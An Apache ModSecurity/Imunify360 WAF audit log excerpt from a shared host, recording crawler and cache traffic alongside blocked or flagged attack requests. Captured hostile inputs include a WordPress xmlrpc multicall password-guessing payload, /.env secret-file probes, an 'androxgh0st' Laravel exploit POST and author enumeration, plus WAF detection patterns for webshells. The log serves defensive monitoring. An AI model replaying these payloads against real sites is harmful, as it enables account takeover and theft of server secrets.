[severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751309507211224 6812 (- - -) Stopwatch2: 1751309507211224 6812; combined=3998, p1=98, p2=3641, p3=112, p4=2, p5=144, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a7eb6416-Z-- --946ae93b-A-- [01/Jul/2025:00:21:47.264504 +0530] aGLcwsDrLf0EZixN_KGfAAAAAAc 34.169.166.192 55743 192.168.74.40 80 --946ae93b-B-- POST /xmlrpc.php HTTP/1.1 Host: maimufashions.in Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 486 --946ae93b-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>admin</string></value><value><string>xmagico</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --946ae93b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 -- Server: Apache Engine-Mode: "ENABLED" --d995ee2a-Z-- --d995ee2a-A-- [01/Jul/2025:00:25:39.733244 +0530] aGLdq_yJlIQQxre3dCUaCwAAAB0 172.70.108.135 51888 192.168.74.40 80 --d995ee2a-B-- GET /.well-known/acme-challenge/JYDW4RXETAUWB-P7S6V7-HZUI46B3R7N HTTP/1.1 Host: www.ihdb.in X-Real-IP: 103.185.74.40 X-Remote-IP: 172.70.108.135 x-forwarded-for: 103.185.74.40 User-Agent: Cpanel-HTTP-Client/1.0 cf-ray: 957fe1165e4be210-MRS accept-encoding: gzip cdn-loop: cloudflare; loops=1 cf-connecting-ip: 103.185.74.40 cf-ipcountry: IN cf-visitor: {"scheme":"http"} X-Forwarded-Proto: http --d995ee2a-F-- HTTP/1.1 200 OK Last-Modified: Mon, 30 Jun 2025 18:55:39 GMT Accept-Ranges: bytes Content-Length: 64 --d995ee2a-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:GET||Perf all:combined=2483, p1=96, p2=2325, p3=60, p4=2, p5=0, sr=52, sw=0, l=0, gc=0||Py scan:5826||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751309739726820 6495 (- - -) Stopwatch2: 1751309739726820 6495; combined=2622, p1=96, p2=2325, p3=60, p4=2, p5=139, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --d995ee2a-Z-- --330e181f-A-- [01/Jul/2025:00:25:40.372606 +0530] aGLdrAJAfdGKJNV61PbALQAAACc 20.171.207.232 57896 192.168.74.40 443 --330e181f-B-- GET /https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/js/js/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --330e181f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --330e181f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/js/js/hotels-udaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/aainag/js/images/testimonials/rajasthan-tours-from-delhi/images/js/js/hotels-udaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/aainag||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751309740354896 17994 (- - -) Stopwatch2: 1751309740354896 17994; combined=4172, p1=166, p2=3872, p3=0, p4=0, p5=134, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --330e181f-Z-- --1d8b6f0d-A-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312680368233 14927 (- - -) Stopwatch2: 1751312680368233 14927; combined=3105, p1=121, p2=2866, p3=0, p4=0, p5=118, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cfd4d159-Z-- --8ea6f201-A-- [01/Jul/2025:01:14:40.977406 +0530] aGLpJw1KYe_1zvYtnAA7WgAAABQ 103.185.74.40 47101 192.168.74.40 443 --8ea6f201-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8ea6f201-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8ea6f201-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312679746717 1231172 (- - -) Stopwatch2: 1751312679746717 1231172; combined=1960, p1=100, p2=1688, p3=0, p4=0, p5=171, sr=45, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8ea6f201-Z-- --b2d2ac37-A-- [01/Jul/2025:01:14:41.591220 +0530] aGLpKW4-GUp1o4MFJsgz9gAAAAM 20.171.207.232 53288 192.168.74.40 443 --b2d2ac37-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/aainag/https/aainag/js/js/hotels-jaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b2d2ac37-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --b2d2ac37-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312681578236 14165 (- - -) Stopwatch2: 1751312681578236 14165; combined=2443, p1=107, p2=2194, p3=0, p4=0, p5=142, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b2d2ac37-Z-- --74f60876-A-- [01/Jul/2025:01:14:42.443692 +0530] aGLpKboqWpAcdxm0wrYe7AAAABc 103.185.74.40 10869 192.168.74.40 443 --74f60876-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --74f60876-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --74f60876-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751312681189648 1254299 (- - -) Stopwatch2: 1751312681189648 1254299; combined=3097, p1=122, p2=2820, p3=0, p4=0, p5=155, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --74f60876-Z-- --17d0c10f-A-- [01/Jul/2025:01:14:42.744438 +0530] aGLpKm4-GUp1o4MFJsgz9wAAAAM 20.171.207.232 53288 192.168.74.40 443 --17d0c10f-B-- GET /aaina/images/rajasthan-tours-from-ahmedabad/js/aainag/https/js/aainag/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --17d0c10f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --17d0c10f-H-- -- Message: Match of "rx ^POST" against "REQUEST_METHOD" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/005_i360_bruteforce.conf"] [line "242"] [id "77350636"] [msg "IM360 WAF: Access to login page in WordPress (counter)||RSV:7.05||RS:0||T:APACHE||MV:GET||"] [severity "NOTICE"] [tag "wp_core"] Stopwatch: 1751314719054762 3719 (- - -) Stopwatch2: 1751314719054762 3719; combined=2380, p1=62, p2=2181, p3=40, p4=1, p5=96, sr=45, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1452e200-Z-- --6d30e93b-A-- [01/Jul/2025:01:48:39.891113 +0530] aGLxHkWWD_dwK1CpKjKSmAAAADg 103.185.74.40 16708 192.168.74.40 443 --6d30e93b-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --6d30e93b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6d30e93b-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751314718913411 979525 (- - -) Stopwatch2: 1751314718913411 979525; combined=2005, p1=81, p2=1755, p3=0, p4=0, p5=168, sr=44, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6d30e93b-Z-- --40aabd4a-A-- [01/Jul/2025:01:48:41.062306 +0530] aGLxH-moPm-3dfW2AlUPKAAAAA0 73.135.86.44 50397 192.168.74.40 443 --40aabd4a-B-- POST /xmlrpc.php HTTP/1.1 Connection: Keep-Alive Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Content-Length: 680 Host: raghuveergears.com -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751314719858427 1204238 (- - -) Stopwatch2: 1751314719858427 1204238; combined=6886, p1=122, p2=5996, p3=300, p4=4, p5=374, sr=115, sw=90, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --40aabd4a-Z-- --bdaabb63-A-- [01/Jul/2025:01:48:41.099454 +0530] aGLxIPfqerEbFBfuaRySugAAAAE 103.185.74.40 10140 192.168.74.40 443 --bdaabb63-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --bdaabb63-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --bdaabb63-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751314720104378 995504 (- - -) Stopwatch2: 1751314720104378 995504; combined=2191, p1=98, p2=1964, p3=0, p4=0, p5=129, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bdaabb63-Z-- --7196c327-A-- [01/Jul/2025:01:48:41.161499 +0530] aGLxHrJ1ylbid2ZhnGz3IQAAAD8 34.23.124.250 55841 192.168.74.40 443 --7196c327-B-- GET //?author=2 HTTP/1.1 Host: siaretech.in Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Accept-Language: en-US,en;q=0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 --7196c327-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316280020344 16116 (- - -) Stopwatch2: 1751316280020344 16116; combined=3117, p1=174, p2=2811, p3=0, p4=0, p5=132, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --991e5447-Z-- --a849486a-A-- [01/Jul/2025:02:14:40.336714 +0530] aGL3NvhZxmJseZYdTFfGFAAAAAY 103.185.74.40 57612 192.168.74.40 443 --a849486a-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --a849486a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a849486a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316278539377 1797486 (- - -) Stopwatch2: 1751316278539377 1797486; combined=2220, p1=78, p2=1997, p3=0, p4=0, p5=144, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a849486a-Z-- --a0a6f044-A-- [01/Jul/2025:02:14:41.193937 +0530] aGL3OYdYEi0AKX5dbhhkfgAAADE 20.171.207.232 50244 192.168.74.40 443 --a0a6f044-B-- GET /https/aainag/images/testimonials/https/js/js/aainag/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --a0a6f044-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --a0a6f044-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316282386240 15712 (- - -) Stopwatch2: 1751316282386240 15712; combined=2517, p1=117, p2=2210, p3=0, p4=0, p5=189, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2059b608-Z-- --84d1a61c-A-- [01/Jul/2025:02:14:42.861254 +0530] aGL3OPhZxmJseZYdTFfGFQAAAAY 103.185.74.40 44309 192.168.74.40 443 --84d1a61c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --84d1a61c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --84d1a61c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751316280595082 2266478 (- - -) Stopwatch2: 1751316280595082 2266478; combined=2351, p1=83, p2=1967, p3=0, p4=0, p5=301, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --84d1a61c-Z-- --f303d62f-A-- [01/Jul/2025:02:14:43.576415 +0530] aGL3O4dYEi0AKX5dbhhkgAAAADE 20.171.207.232 50244 192.168.74.40 443 --f303d62f-B-- GET /https/aainag/images/testimonials/https/images/https/js/hotels-bikaner.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f303d62f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --f303d62f-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0d9dc35b-Z-- --1541812f-A-- [01/Jul/2025:02:28:41.120100 +0530] aGL6gZdzv0GHXgI5ziCWPgAAAEY 196.251.88.57 52434 192.168.74.40 80 --1541812f-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive --1541812f-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --1541812f-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751317121116605 3874 (- - -) Stopwatch2: 1751317121116605 3874; combined=955, p1=92, p2=474, p3=0, p4=0, p5=389, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --1541812f-Z-- --2f3b0d6b-A-- [01/Jul/2025:02:28:41.271495 +0530] aGL6gVr_i253wrJd-GiW_QAAABM 57.141.0.6 53126 192.168.74.40 443 --2f3b0d6b-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/about-us.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --2f3b0d6b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2f3b0d6b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/about-us.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-jodhpur/rajasthan-tours-from-jodhpur/Rajasthan-Travel-Guides/rajasthan-tours-from-udaipur/rajasthan-tours-from-udaipur/Rajasthan-Travel-Guides/rajasthan-tours-from-agra/Rajasthan-Travel-Guides/images/testimonials/about-us.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --51cd6564-Z-- --e6c0bb0a-A-- [01/Jul/2025:02:29:15.099753 +0530] aGL6o4iu6W1gdjTpockviAAAADA 196.251.88.57 58010 192.168.74.40 80 --e6c0bb0a-B-- POST / HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 20 Content-Type: application/x-www-form-urlencoded --e6c0bb0a-C-- 0x%5B%5D=androxgh0st --e6c0bb0a-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --e6c0bb0a-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "280"] [id "77317941"] [msg "IM360 WAF: Laravel Apps Leaking Secrets exploit attempt||MV:androxgh0st||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P:0x[]=androxgh0st& F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751317155088402 11606 (- - -) Stopwatch2: 1751317155088402 11606; combined=2053, p1=133, p2=1517, p3=0, p4=0, p5=403, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e6c0bb0a-Z-- --fa10c130-A-- [01/Jul/2025:02:29:15.815822 +0530] aGL6o9OPV1xnJ9i3YWu6vgAAAEQ 216.73.216.230 48104 192.168.74.40 80 --fa10c130-B-- GET /robots.txt HTTP/1.1 Accept: */* User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) Accept-Encoding: gzip, br, zstd, deflate Host: arts.net.in Via: 1.1 squid-proxy-5b5d847c96-krm6p (squid/6.10) X-Forwarded-For: 10.1.82.128 Cache-Control: max-age=259200 Connection: keep-alive --fa10c130-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/7.4.33 Link: <http://arts.net.in/wp-json/>; rel="https://api.w.org/" -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a701505a-Z-- --c2100242-A-- [01/Jul/2025:02:29:43.663449 +0530] aGL6v1r_i253wrJd-GiXAgAAABM 196.251.88.57 62747 192.168.74.40 443 --c2100242-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 